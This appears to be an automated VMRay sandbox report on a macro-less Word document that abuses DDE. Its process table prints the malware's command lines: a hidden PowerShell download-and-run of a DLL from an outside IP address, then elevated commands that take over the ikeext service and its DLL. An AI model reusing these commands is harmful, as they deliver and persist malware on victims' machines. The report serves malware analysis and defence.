Macro-less Word Doc. uses DDE to Execute Powershell, Download DLL | VMRay Analyzer Report
Analysis Information

Creation Time: 2017-10-11 13:00 (UTC+2)
VM Analysis Duration Time: 00:02:16
Execution Successful: True
Sample Filename: exaai.doc
Command Line Parameters: False
Prescript: False
Number of Processes: 21
Termination Reason: Timeout
Reputation Enabled: True
VTI Information

VTI Score: 100 / 100
VTI Database Version: 2.6
VTI Rule Match Count: 30
VTI Rule Type: Documents
Tags: #malware
Monitored Processes
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
|---|---|---|---|---|---|---|
| #1 | 0x98c | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" | |
| #2 | 0xa38 | Child Process | Medium | cmd.exe | c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK | #1 |
| #3 | 0xa50 | Child Process | Medium | powershell.exe | powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK | #2 |
| #4 | 0xae4 | Child Process | Medium | rundll32.exe | "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK | #3 |
| #5 | 0xb54 | RPC Server | High (Elevated) | dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9} | #4 |
| #6 | 0xb74 | Child Process | High (Elevated) | rundll32.exe | "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS | #5 |
| #7 | 0xb7c | Child Process | High (Elevated) | cmd.exe | C:\Windows\system32\cmd.exe /c "net stop /y ikeext" | #6 |
| #8 | 0xb90 | Child Process | High (Elevated) | net.exe | net stop /y ikeext | #7 |
| #9 | 0xb98 | Child Process | High (Elevated) | net1.exe | C:\Windows\system32\net1 stop /y ikeext | #8 |
| #10 | 0xba0 | Child Process | High (Elevated) | cmd.exe | C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll" | #6 |
| #12 | 0xbc0 | Child Process | High (Elevated) | cmd.exe | C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F" | #6 |
| #14 | 0xbe0 | Child Process | High (Elevated) | cmd.exe | C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F" | #6 |
| #16 | 0xc00 | Child Process | High (Elevated) | cmd.exe | C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto" | #6 |
| #17 | 0xc14 | Child Process | High (Elevated) | sc.exe | sc config ikeext start= auto | #16 |
| #18 | 0xc20 | Child Process | High (Elevated) | cmd.exe | C:\Windows\system32\cmd.exe /c "net start ikeext" | #6 |
| #19 | 0xc34 | Child Process | High (Elevated) | net.exe | net start ikeext | #18 |
| #20 | 0xc3c | Child Process | High (Elevated) | net1.exe | C:\Windows\system32\net1 start ikeext | #19 |
| #23 | 0xcc4 | Child Process | Medium | cmd.exe | cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" " | #4 |
| #24 | 0xce0 | Child Process | Medium | attrib.exe | ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll" | #23 |
| #25 | 0xce8 | Child Process | Medium | ping.exe | Ping 127.0.0.1 -n 3 | #23 |
| #26 | 0xd04 | Child Process | Medium | cmd.exe | cmd.exe /c exit | #23 |
Sample Information

ID: #19550
MD5 Hash Value: 292843976600e8ad2130224d70356bfc
SHA1 Hash Value: 31bad7ea8606e3e6d98692fa9f4b3f18ebb3c809
SHA256 Hash Value: d5c27308f50a9c6d8ccd01269ca09a7a13e1615945b8047c4e55c610718e317e
Filename: exaai.doc
File Size: 19.98 KB (20457 bytes)
File Type: Word Document
Has VBA Macros: False
Analyzer and Virtual Machine Information

Analyzer Version: 2.2.0
Analyzer Build Date: 2017-09-28 17:24
Microsoft Office Version: 2013
Microsoft Word Version: 15.0.4569.1504
Internet Explorer Version: 8.0.7601.17514
Chrome Version: 58.0.3029.110
Firefox Version: 25.0
Flash Version: 10.3.183.90
Java Version: 7.0.600
VM Name: win7_32_sp1-mso2013
VM Architecture: x86 32-bit PAE
VM OS: Windows 7
VM Kernel Version: 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)